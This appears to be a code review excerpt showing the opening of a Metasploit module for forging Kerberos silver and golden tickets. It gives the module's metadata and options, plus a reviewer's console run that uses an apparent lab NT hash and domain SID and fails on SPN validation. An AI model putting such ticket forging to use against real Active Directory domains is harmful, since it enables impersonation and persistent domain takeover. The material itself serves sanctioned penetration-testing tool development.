modules/auxiliary/admin/kerberos/forge_ticket.rb

```diff
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::Kerberos::Client
+  include Msf::Exploit::Remote::Kerberos::Ticket
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kerberos Silver/Golden Ticket Forging',
+        'Description' => %q{
+          This module forges a Kerberos ticket
+        },
+        'Author' => [
+          'Benjamin Delpy', # Original Implementation
+          'Dean Welch' # Metasploit Module
+        ],
+        'References' => [
+          %w[URL https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it]
+        ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [],
+          'SideEffects' => [],
+          'Reliability' => [],
+          'AKA' => ['Silver Ticket', 'Golden Ticket', 'Ticketer']
+        },
+        'Actions' => [
+          ['FORGE_SILVER', { 'Description' => 'Forge a Silver Ticket' } ],
+          ['FORGE_GOLDEN', { 'Description' => 'Forge a Golden Ticket' } ],
+        ],
+        'DefaultAction' => 'FORGE_SILVER'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USER', [ true, 'The Domain User' ]),
+        OptString.new('NTHASH', [ true, 'The krbtgt/service nthash' ]),
+        OptString.new('DOMAIN', [ true, 'The Domain (upper case) Ex: DEMO.LOCAL' ]),
+        OptString.new('DOMAIN_SID', [ true, 'The Domain SID, Ex: S-1-5-21-1755879683-3641577184-3486455962']),
+        OptString.new('SPN', [ false, 'The Service Principal Name (Only used for silver ticket)'], regex: %r{.*/.*}),
```

Comment:
not a blocker: I wish this gave a human readable reason why the module failed validation:

```
msf6 auxiliary(admin/kerberos/forge_ticket) > forge_silver domain=adf3.local domain_sid=S-1-5-21-1755879683-3641577184-3486455962 nthash=88E4D9FABAECF3DEC18DD80905521B29 user=Administrator spn=mssql

[-] Msf::OptionValidateError The following options failed to validate: SPN
```